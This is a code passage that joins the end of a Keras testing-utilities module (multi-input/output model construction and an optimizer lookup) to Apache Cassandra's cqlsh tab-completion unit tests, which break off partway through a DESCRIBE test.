branch_a: A sequence of layers for branch a of the model.
branch_b: A sequence of layers for branch b of the model.
shared_input_branch: An optional sequence of layers to apply to a single
input, before applying both branches to that intermediate result. If set,
the model will take only one input instead of two. Defaults to None.
shared_output_branch: An optional sequence of layers to merge the
intermediate results produced by branch a and branch b. If set,
the model will produce only one output instead of two. Defaults to None.
Returns:
A multi-io model of the type specified by `get_model_type`, specified
by the different branches.
"""
# Extract the functional inputs from the layer lists
if shared_input_branch:
inputs = shared_input_branch[0]
shared_input_branch = shared_input_branch[1:]
else:
inputs = branch_a[0], branch_b[0]
branch_a = branch_a[1:]
branch_b = branch_b[1:]
model_type = get_model_type()
if model_type == 'subclass':
return _MultiIOSubclassModel(branch_a, branch_b, shared_input_branch,
shared_output_branch)
if model_type == 'subclass_custom_build':
return _MultiIOSubclassModelCustomBuild((lambda: branch_a),
(lambda: branch_b),
(lambda: shared_input_branch),
(lambda: shared_output_branch))
if model_type == 'sequential':
raise ValueError('Cannot use `get_multi_io_model` to construct '
'sequential models')
if model_type == 'functional':
if shared_input_branch:
a_and_b = inputs
for layer in shared_input_branch:
a_and_b = layer(a_and_b)
a = a_and_b
b = a_and_b
else:
a, b = inputs
for layer in branch_a:
a = layer(a)
for layer in branch_b:
b = layer(b)
outputs = a, b
if shared_output_branch:
for layer in shared_output_branch:
outputs = layer(outputs)
return keras.Model(inputs, outputs)
raise ValueError('Unknown model type {}'.format(model_type))
_V2_OPTIMIZER_MAP = {
'adadelta': adadelta_v2.Adadelta,
'adagrad': adagrad_v2.Adagrad,
'adam': adam_v2.Adam,
'adamax': adamax_v2.Adamax,
'nadam': nadam_v2.Nadam,
'rmsprop': rmsprop_v2.RMSprop,
'sgd': gradient_descent_v2.SGD
}
def get_v2_optimizer(name, **kwargs):
"""Get the v2 optimizer requested.
This is only necessary until v2 are the default, as we are testing in Eager,
and Eager + v1 optimizers fail tests. When we are in v2, the strings alone
should be sufficient, and this mapping can theoretically be removed.
Args:
name: string name of Keras v2 optimizer.
**kwargs: any kwargs to pass to the optimizer constructor.
Returns:
Initialized Keras v2 optimizer.
Raises:
ValueError: if an unknown name was passed.
"""
try:
return _V2_OPTIMIZER_MAP[name](**kwargs)
except KeyError:
raise ValueError(
'Could not find requested v2 optimizer: {}\nValid choices: {}'.format(
name, list(_V2_OPTIMIZER_MAP.keys())))
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# to configure behavior, define $CQL_TEST_HOST to the destination address
# and $CQL_TEST_PORT to the associated port.
from __future__ import with_statement
import re
from .basecase import BaseTestCase, cqlsh
from .cassconnect import testrun_cqlsh
import unittest
import sys
BEL = '\x07' # the terminal-bell character
CTRL_C = '\x03'
TAB = '\t'
# completions not printed out in this many seconds may not be acceptable.
# tune if needed for a slow system, etc, but be aware that the test will
# need to wait this long for each completion test, to make sure more info
# isn't coming
COMPLETION_RESPONSE_TIME = 0.5
completion_separation_re = re.compile(r'\s+')
@unittest.skipIf(sys.platform == "win32", 'Tab completion tests not supported on Windows')
class CqlshCompletionCase(BaseTestCase):
def setUp(self):
self.cqlsh_runner = testrun_cqlsh(cqlver=None, env={'COLUMNS': '100000'})
self.cqlsh = self.cqlsh_runner.__enter__()
def tearDown(self):
self.cqlsh_runner.__exit__(None, None, None)
def _get_completions(self, inputstring, split_completed_lines=True):
"""
Get results of tab completion in cqlsh. Returns a bare string if a
string completes immediately. Otherwise, returns a set of all
whitespace-separated tokens in the offered completions by default, or a
list of the lines in the offered completions if split_completed_lines is
False.
"""
self.cqlsh.send(inputstring)
self.cqlsh.send(TAB)
immediate = self.cqlsh.read_up_to_timeout(COMPLETION_RESPONSE_TIME)
immediate = immediate.replace(' \b', '')
self.assertEqual(immediate[:len(inputstring)], inputstring)
immediate = immediate[len(inputstring):]
immediate = immediate.replace(BEL, '')
if immediate:
return immediate
self.cqlsh.send(TAB)
choice_output = self.cqlsh.read_up_to_timeout(COMPLETION_RESPONSE_TIME)
if choice_output == BEL:
choice_output = ''
self.cqlsh.send(CTRL_C) # cancel any current line
self.cqlsh.read_to_next_prompt()
choice_lines = choice_output.splitlines()
if choice_lines:
# ensure the last line of the completion is the prompt
prompt_regex = self.cqlsh.prompt.lstrip() + re.escape(inputstring)
msg = ('Double-tab completion '
'does not print prompt for input "{}"'.format(inputstring))
self.assertRegexpMatches(choice_lines[-1], prompt_regex, msg=msg)
choice_lines = [line.strip() for line in choice_lines[:-1]]
choice_lines = [line for line in choice_lines if line]
if split_completed_lines:
completed_lines = map(set, (completion_separation_re.split(line.strip())
for line in choice_lines))
if not completed_lines:
return set()
completed_tokens = set.union(*completed_lines)
return completed_tokens - {''}
else:
return choice_lines
assert False
def _trycompletions_inner(self, inputstring, immediate='', choices=(),
other_choices_ok=False,
split_completed_lines=True):
"""
Test tab completion in cqlsh. Enters in the text in inputstring, then
simulates a tab keypress to see what is immediately completed (this
should only happen when there is only one completion possible). If
there is an immediate completion, the new text is expected to match
'immediate'. If there is no immediate completion, another tab keypress
is simulated in order to get a list of choices, which are expected to
match the items in 'choices' (order is not important, but case is).
"""
completed = self._get_completions(inputstring,
split_completed_lines=split_completed_lines)
if immediate:
msg = 'cqlsh completed %r, but we expected %r' % (completed, immediate)
self.assertEqual(completed, immediate, msg=msg)
return
if other_choices_ok:
self.assertEqual(set(choices), completed.intersection(choices))
else:
self.assertEqual(set(choices), set(completed))
def trycompletions(self, inputstring, immediate='', choices=(),
other_choices_ok=False, split_completed_lines=True):
try:
self._trycompletions_inner(inputstring, immediate, choices,
other_choices_ok=other_choices_ok,
split_completed_lines=split_completed_lines)
finally:
self.cqlsh.send(CTRL_C) # cancel any current line
self.cqlsh.read_to_next_prompt()
def strategies(self):
return self.module.CqlRuleSet.replication_strategies
class TestCqlshCompletion(CqlshCompletionCase):
cqlver = '3.1.6'
module = cqlsh.cql3handling
def test_complete_on_empty_string(self):
self.trycompletions('', choices=('?', 'ALTER', 'BEGIN', 'CAPTURE', 'CONSISTENCY',
'COPY', 'CREATE', 'DEBUG', 'DELETE', 'DESC', 'DESCRIBE',
'DROP', 'GRANT', 'HELP', 'INSERT', 'LIST', 'LOGIN', 'PAGING', 'REVOKE',
'SELECT', 'SHOW', 'SOURCE', 'TRACING', 'EXPAND', 'SERIAL', 'TRUNCATE',
'UPDATE', 'USE', 'exit', 'quit', 'CLEAR', 'CLS'))
def test_complete_command_words(self):
self.trycompletions('alt', '\b\b\bALTER ')
self.trycompletions('I', 'NSERT INTO ')
self.trycompletions('exit', ' ')
def test_complete_in_uuid(self):
pass
def test_complete_in_select(self):
pass
def test_complete_in_insert(self):
self.trycompletions('INSERT INTO ',
choices=('twenty_rows_table',
'ascii_with_special_chars',
'users',
'has_all_types',
'system.',
'empty_composite_table',
'empty_table',
'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'system_traces.',
'songs'),
other_choices_ok=True)
self.trycompletions('INSERT INTO twenty_rows_composite_table',
immediate=' ')
self.trycompletions('INSERT INTO twenty_rows_composite_table ',
choices=['(', 'JSON'])
self.trycompletions('INSERT INTO twenty_rows_composite_table (a, b ',
choices=(')', ','))
self.trycompletions('INSERT INTO twenty_rows_composite_table (a, b, ',
immediate='c ')
self.trycompletions('INSERT INTO twenty_rows_composite_table (a, b, c ',
choices=(',', ')'))
self.trycompletions('INSERT INTO twenty_rows_composite_table (a, b)',
immediate=' VALUES ( ')
self.trycompletions('INSERT INTO twenty_rows_composite_table (a, b, c) VAL',
immediate='UES ( ')
self.trycompletions(
'INSERT INTO twenty_rows_composite_table (a, b, c) VALUES (',
['<value for a (text)>'],
split_completed_lines=False)
self.trycompletions(
"INSERT INTO twenty_rows_composite_table (a, b, c) VALUES ('",
['<value for a (text)>'],
split_completed_lines=False)
self.trycompletions(
"INSERT INTO twenty_rows_composite_table (a, b, c) VALUES ( 'eggs",
['<value for a (text)>'],
split_completed_lines=False)
self.trycompletions(
"INSERT INTO twenty_rows_composite_table (a, b, c) VALUES ('eggs'",
immediate=', ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs',"),
['<value for b (text)>'],
split_completed_lines=False)
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam')"),
immediate=' ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') "),
choices=[';', 'USING', 'IF'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam');"),
choices=['?', 'ALTER', 'BEGIN', 'CAPTURE', 'CONSISTENCY', 'COPY',
'CREATE', 'DEBUG', 'DELETE', 'DESC', 'DESCRIBE', 'DROP',
'EXPAND', 'GRANT', 'HELP', 'INSERT', 'LIST', 'LOGIN', 'PAGING',
'REVOKE', 'SELECT', 'SHOW', 'SOURCE', 'SERIAL', 'TRACING',
'TRUNCATE', 'UPDATE', 'USE', 'exit', 'quit',
'CLEAR', 'CLS'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') US"),
immediate='ING T')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING"),
immediate=' T')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING T"),
choices=['TTL', 'TIMESTAMP'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TT"),
immediate='L ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TI"),
immediate='MESTAMP ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TIMESTAMP "),
choices=['<wholenumber>'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL "),
choices=['<wholenumber>'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TIMESTAMP 0 "),
choices=['AND', ';'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL 0 "),
choices=['AND', ';'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TIMESTAMP 0 A"),
immediate='ND TTL ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL 0 A"),
immediate='ND TIMESTAMP ')
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL 0 AND TIMESTAMP "),
choices=['<wholenumber>'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL 0 AND TIMESTAMP 0 "),
choices=['AND', ';'])
self.trycompletions(
("INSERT INTO twenty_rows_composite_table (a, b, c) "
"VALUES ( 'eggs', 'sausage', 'spam') USING TTL 0 AND TIMESTAMP 0 AND "),
choices=[])
def test_complete_in_update(self):
self.trycompletions("UPD", immediate="ATE ")
self.trycompletions("UPDATE ",
choices=['twenty_rows_table',
'users', 'has_all_types', 'system.',
'ascii_with_special_chars',
'empty_composite_table', 'empty_table',
'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'system_traces.', 'songs'],
other_choices_ok=True)
self.trycompletions("UPDATE empty_table ", choices=['USING', 'SET'])
self.trycompletions("UPDATE empty_table S",
immediate='ET lonelycol = ')
self.trycompletions("UPDATE empty_table SET lon",
immediate='elycol = ')
self.trycompletions("UPDATE empty_table SET lonelycol",
immediate=' = ')
self.trycompletions("UPDATE empty_table U", immediate='SING T')
self.trycompletions("UPDATE empty_table USING T",
choices=["TTL", "TIMESTAMP"])
self.trycompletions("UPDATE empty_table SET lonelycol = ",
choices=['<term (text)>'],
split_completed_lines=False)
self.trycompletions("UPDATE empty_table SET lonelycol = 'eg",
choices=['<term (text)>'],
split_completed_lines=False)
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs'",
choices=[',', 'WHERE'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE ",
choices=['TOKEN(', 'lonelykey'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE ",
choices=['TOKEN(', 'lonelykey'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE lonel",
immediate='ykey ')
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE lonelykey ",
choices=['=', '<=', '>=', '>', '<', 'CONTAINS', 'IN', '['])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE lonelykey = 0.0 ",
choices=['AND', 'IF', ';'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE lonelykey = 0.0 AND ",
choices=['TOKEN(', 'lonelykey'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE TOKEN(lonelykey ",
choices=[',', ')'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE TOKEN(lonelykey) ",
choices=['=', '<=', '>=', '<', '>'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE TOKEN(lonelykey) <= TOKEN(13) ",
choices=[';', 'AND', 'IF'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE TOKEN(lonelykey) <= TOKEN(13) IF ",
choices=['EXISTS', '<quotedName>', '<identifier>'])
self.trycompletions("UPDATE empty_table SET lonelycol = 'eggs' WHERE TOKEN(lonelykey) <= TOKEN(13) IF EXISTS ",
choices=['>=', '!=', '<=', 'IN', '[', ';', '=', '<', '>', '.'])
def test_complete_in_delete(self):
self.trycompletions('DELETE F', choices=['FROM', '<identifier>', '<quotedName>'])
self.trycompletions('DELETE a ', choices=['FROM', '[', '.', ','])
self.trycompletions('DELETE a [',
choices=['<wholenumber>', 'false', '-', '<uuid>',
'<pgStringLiteral>', '<float>', 'TOKEN',
'<identifier>', '<quotedStringLiteral>',
'{', '[', 'NULL', 'true', '<blobLiteral>'])
self.trycompletions('DELETE a, ',
choices=['<identifier>', '<quotedName>'])
self.trycompletions('DELETE a FROM ',
choices=['twenty_rows_table',
'ascii_with_special_chars', 'users',
'has_all_types', 'system.',
'empty_composite_table', 'empty_table',
'system_auth.', 'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'system_traces.', 'songs',
'"' + self.cqlsh.keyspace + '".'],
other_choices_ok=True)
self.trycompletions('DELETE FROM ',
choices=['twenty_rows_table',
'ascii_with_special_chars', 'users',
'has_all_types', 'system.',
'empty_composite_table', 'empty_table',
'system_auth.', 'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'system_traces.', 'songs',
'system_auth.', 'system_distributed.',
'system_schema.', 'system_traces.',
'"' + self.cqlsh.keyspace + '".'],
other_choices_ok=True)
self.trycompletions('DELETE FROM twenty_rows_composite_table ',
choices=['USING', 'WHERE'])
self.trycompletions('DELETE FROM twenty_rows_composite_table U',
immediate='SING TIMESTAMP ')
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP ',
choices=['<wholenumber>'])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0',
choices=['<wholenumber>'])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 ',
immediate='WHERE ')
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE ',
choices=['a', 'b', 'TOKEN('])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE a ',
choices=['<=', '>=', 'CONTAINS', 'IN', '[', '=', '<', '>'])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE TOKEN(',
immediate='a ')
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE TOKEN(a',
immediate=' ')
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE TOKEN(a ',
choices=[')', ','])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE TOKEN(a) ',
choices=['>=', '<=', '=', '<', '>'])
self.trycompletions('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE TOKEN(a) >= ',
choices=['false', 'true', '<pgStringLiteral>',
'token(', '-', '<float>', 'TOKEN',
'<identifier>', '<uuid>', '{', '[', 'NULL',
'<quotedStringLiteral>', '<blobLiteral>',
'<wholenumber>'])
self.trycompletions(('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE '
'TOKEN(a) >= TOKEN(0) '),
choices=['AND', 'IF', ';'])
self.trycompletions(('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE '
'TOKEN(a) >= TOKEN(0) IF '),
choices=['EXISTS', '<identifier>', '<quotedName>'])
self.trycompletions(('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE '
'TOKEN(a) >= TOKEN(0) IF b '),
choices=['>=', '!=', '<=', 'IN', '=', '<', '>'])
self.trycompletions(('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE '
'TOKEN(a) >= TOKEN(0) IF b < 0 '),
choices=['AND', ';'])
self.trycompletions(('DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE '
'TOKEN(a) >= TOKEN(0) IF b < 0 AND '),
choices=['<identifier>', '<quotedName>'])
self.trycompletions(("DELETE FROM twenty_rows_composite_table USING TIMESTAMP 0 WHERE "
"b = 'eggs'"),
choices=['AND', 'IF', ';'])
def test_complete_in_batch(self):
pass
def test_complete_in_create_keyspace(self):
self.trycompletions('create keyspace ', '', choices=('<identifier>', '<quotedName>', 'IF'))
self.trycompletions('create keyspace moo ',
"WITH replication = {'class': '")
self.trycompletions('create keyspace "12SomeName" with ',
"replication = {'class': '")
self.trycompletions("create keyspace fjdkljf with foo=bar ", "",
choices=('AND', ';'))
self.trycompletions("create keyspace fjdkljf with foo=bar AND ",
"replication = {'class': '")
self.trycompletions("create keyspace moo with replication", " = {'class': '")
self.trycompletions("create keyspace moo with replication=", " {'class': '")
self.trycompletions("create keyspace moo with replication={", "'class':'")
self.trycompletions("create keyspace moo with replication={'class'", ":'")
self.trycompletions("create keyspace moo with replication={'class': ", "'")
self.trycompletions("create keyspace moo with replication={'class': '", "",
choices=self.strategies())
# ttl is an "unreserved keyword". should work
self.trycompletions("create keySPACE ttl with replication ="
"{ 'class' : 'SimpleStrategy'", ", 'replication_factor': ")
self.trycompletions("create keyspace ttl with replication ="
"{'class':'SimpleStrategy',", " 'replication_factor': ")
self.trycompletions("create keyspace \"ttl\" with replication ="
"{'class': 'SimpleStrategy', ", "'replication_factor': ")
self.trycompletions("create keyspace \"ttl\" with replication ="
"{'class': 'SimpleStrategy', 'repl", "ication_factor'")
self.trycompletions("create keyspace foo with replication ="
"{'class': 'SimpleStrategy', 'replication_factor': ", '',
choices=('<term>',))
self.trycompletions("create keyspace foo with replication ="
"{'class': 'SimpleStrategy', 'replication_factor': 1", '',
choices=('<term>',))
self.trycompletions("create keyspace foo with replication ="
"{'class': 'SimpleStrategy', 'replication_factor': 1 ", '}')
self.trycompletions("create keyspace foo with replication ="
"{'class': 'SimpleStrategy', 'replication_factor': 1, ",
'', choices=())
self.trycompletions("create keyspace foo with replication ="
"{'class': 'SimpleStrategy', 'replication_factor': 1} ",
'', choices=('AND', ';'))
self.trycompletions("create keyspace foo with replication ="
"{'class': 'NetworkTopologyStrategy', ", '',
choices=('<dc_name>',))
self.trycompletions("create keyspace \"PB and J\" with replication={"
"'class': 'NetworkTopologyStrategy'", ', ')
self.trycompletions("create keyspace PBJ with replication={"
"'class': 'NetworkTopologyStrategy'} and ",
"durable_writes = '")
def test_complete_in_string_literals(self):
# would be great if we could get a space after this sort of completion,
# but readline really wants to make things difficult for us
self.trycompletions("create keyspace blah with replication = {'class': 'Sim",
"pleStrategy'")
def test_complete_in_drop(self):
self.trycompletions('DR', immediate='OP ')
self.trycompletions('DROP ',
choices=['AGGREGATE', 'COLUMNFAMILY', 'FUNCTION',
'INDEX', 'KEYSPACE', 'ROLE', 'TABLE',
'TRIGGER', 'TYPE', 'USER', 'MATERIALIZED'])
def test_complete_in_drop_keyspace(self):
self.trycompletions('DROP K', immediate='EYSPACE ')
quoted_keyspace = '"' + self.cqlsh.keyspace + '"'
self.trycompletions('DROP KEYSPACE ',
choices=['IF', quoted_keyspace])
self.trycompletions('DROP KEYSPACE ' + quoted_keyspace,
choices=[';'])
self.trycompletions('DROP KEYSPACE I',
immediate='F EXISTS ' + quoted_keyspace + ';')
def create_columnfamily_table_template(self, name):
"""Parameterized test for CREATE COLUMNFAMILY and CREATE TABLE. Since
they're synonyms, they should have the same completion behavior, so this
test avoids duplication between tests for the two statements."""
prefix = 'CREATE ' + name + ' '
quoted_keyspace = '"' + self.cqlsh.keyspace + '"'
self.trycompletions(prefix + '',
choices=['IF', quoted_keyspace, '<new_table_name>'])
self.trycompletions(prefix + 'IF ',
immediate='NOT EXISTS ')
self.trycompletions(prefix + 'IF NOT EXISTS ',
choices=['<new_table_name>', quoted_keyspace])
self.trycompletions(prefix + 'IF NOT EXISTS new_table ',
immediate='( ')
self.trycompletions(prefix + quoted_keyspace, choices=['.', '('])
self.trycompletions(prefix + quoted_keyspace + '( ',
choices=['<new_column_name>', '<identifier>',
'<quotedName>'])
self.trycompletions(prefix + quoted_keyspace + '.',
choices=['<new_table_name>'])
self.trycompletions(prefix + quoted_keyspace + '.new_table ',
immediate='( ')
self.trycompletions(prefix + quoted_keyspace + '.new_table ( ',
choices=['<new_column_name>', '<identifier>',
'<quotedName>'])
self.trycompletions(prefix + ' new_table ( ',
choices=['<new_column_name>', '<identifier>',
'<quotedName>'])
self.trycompletions(prefix + ' new_table (col_a ine',
immediate='t ')
self.trycompletions(prefix + ' new_table (col_a int ',
choices=[',', 'PRIMARY'])
self.trycompletions(prefix + ' new_table (col_a int P',
immediate='RIMARY KEY ')
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY ',
choices=[')', ','])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY,',
choices=['<identifier>', '<quotedName>'])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY)',
immediate=' ')
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) ',
choices=[';', 'WITH'])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) W',
immediate='ITH ')
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) WITH ',
choices=['bloom_filter_fp_chance', 'compaction',
'compression',
'default_time_to_live', 'gc_grace_seconds',
'max_index_interval',
'memtable_flush_period_in_ms',
'CLUSTERING',
'COMPACT', 'caching', 'comment',
'min_index_interval', 'speculative_retry', 'additional_write_policy', 'cdc'])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) WITH ',
choices=['bloom_filter_fp_chance', 'compaction',
'compression',
'default_time_to_live', 'gc_grace_seconds',
'max_index_interval',
'memtable_flush_period_in_ms',
'CLUSTERING',
'COMPACT', 'caching', 'comment',
'min_index_interval', 'speculative_retry', 'additional_write_policy', 'cdc'])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) WITH bloom_filter_fp_chance ',
immediate='= ')
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) WITH bloom_filter_fp_chance = ',
choices=['<float_between_0_and_1>'])
self.trycompletions(prefix + ' new_table (col_a int PRIMARY KEY) WITH compaction ',
immediate="= {'class': '")
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': '",
choices=['SizeTieredCompactionStrategy',
'LeveledCompactionStrategy',
'DateTieredCompactionStrategy',
'TimeWindowCompactionStrategy'])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'S",
immediate="izeTieredCompactionStrategy'")
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy",
immediate="'")
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy'",
choices=['}', ','])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy', ",
immediate="'")
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy', '",
choices=['bucket_high', 'bucket_low', 'class',
'enabled', 'max_threshold',
'min_sstable_size', 'min_threshold',
'tombstone_compaction_interval',
'tombstone_threshold',
'unchecked_tombstone_compaction',
'only_purge_repaired_tombstones'])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy'}",
choices=[';', 'AND'])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'SizeTieredCompactionStrategy'} AND ",
choices=['bloom_filter_fp_chance', 'compaction',
'compression',
'default_time_to_live', 'gc_grace_seconds',
'max_index_interval',
'memtable_flush_period_in_ms',
'CLUSTERING',
'COMPACT', 'caching', 'comment',
'min_index_interval', 'speculative_retry', 'additional_write_policy', 'cdc'])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'DateTieredCompactionStrategy', '",
choices=['base_time_seconds', 'max_sstable_age_days',
'timestamp_resolution', 'min_threshold', 'class', 'max_threshold',
'tombstone_compaction_interval', 'tombstone_threshold',
'enabled', 'unchecked_tombstone_compaction',
'max_window_size_seconds', 'only_purge_repaired_tombstones'])
self.trycompletions(prefix + " new_table (col_a int PRIMARY KEY) WITH compaction = "
+ "{'class': 'TimeWindowCompactionStrategy', '",
choices=['compaction_window_unit', 'compaction_window_size',
'timestamp_resolution', 'min_threshold', 'class', 'max_threshold',
'tombstone_compaction_interval', 'tombstone_threshold',
'enabled', 'unchecked_tombstone_compaction',
'only_purge_repaired_tombstones'])
def test_complete_in_create_columnfamily(self):
self.trycompletions('CREATE C', choices=['COLUMNFAMILY', 'CUSTOM'])
self.trycompletions('CREATE CO', immediate='LUMNFAMILY ')
self.create_columnfamily_table_template('COLUMNFAMILY')
def test_complete_in_create_table(self):
self.trycompletions('CREATE T', choices=['TRIGGER', 'TABLE', 'TYPE'])
self.trycompletions('CREATE TA', immediate='BLE ')
self.create_columnfamily_table_template('TABLE')
def test_complete_in_describe(self):
"""
Tests for Cassandra-10733
"""
self.trycompletions('DES', immediate='C')
# quoted_keyspace = '"' + self.cqlsh.keyspace + '"'
self.trycompletions('DESCR', immediate='IBE ')
self.trycompletions('DESC TABLE ',
choices=['twenty_rows_table',
'ascii_with_special_chars', 'users',
'has_all_types', 'system.',
'empty_composite_table', 'empty_table',
'system_auth.', 'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'system_traces.', 'songs',
'system_distributed.',
'"' + self.cqlsh.keyspace + '".'],
other_choices_ok=True)
self.trycompletions('DESC TYPE ',
choices=['system.',
'system_auth.',
'system_traces.',
'system_distributed.',
'address',
'phone_number',
'band_info_type',
'tags'],
other_choices_ok=True)
self.trycompletions('DESC FUNCTION ',
choices=['system.',
'system_auth.',
'system_traces.',
'system_distributed.',
'fbestband',
'fbestsong',
'fmax',
'fmin',
'"' + self.cqlsh.keyspace + '".'],
other_choices_ok=True)
self.trycompletions('DESC AGGREGATE ',
choices=['system.',
'system_auth.',
'system_traces.',
'system_distributed.',
'aggmin',
'aggmax',
'"' + self.cqlsh.keyspace + '".'],
other_choices_ok=True)
# Unfortunately these commented tests will not work. This is due to the keyspace name containing quotes;
# cqlsh auto-completes a DESC differently when the keyspace contains quotes. I'll leave the
# test here though in case we ever change this script to test using keyspace names without
# quotes
# self.trycompletions('DESC TABLE ' + '"' + self.cqlsh.keyspace + '"', immediate='.')
self.trycompletions('DESC TABLE ' + '"' + self.cqlsh.keyspace + '".',
choices=['twenty_rows_table',
'ascii_with_special_chars',
'users',
'has_all_types',
'empty_composite_table',
'empty_table',
'undefined_values_table',
'dynamic_columns',
'twenty_rows_composite_table',
'utf8_with_special_chars',
'songs'],
other_choices_ok=True)
# See comment above for DESC TABLE
# self.trycompletions('DESC TYPE ' + '"' + self.cqlsh.keyspace + '"', immediate='.')
self.trycompletions('DESC TYPE ' + '"' + self.cqlsh.keyspace + '".',
choices=['address',
'phone_number',
'band_info_type',
'tags'],
other_choices_ok=True)
# See comment above for DESC TABLE
# self.trycompletions('DESC FUNCTION ' + '"' + self.cqlsh.keyspace + '"', immediate='.f')
self.trycompletions('DESC FUNCTION ' + '"' + self.cqlsh.keyspace + '".', immediate='f')
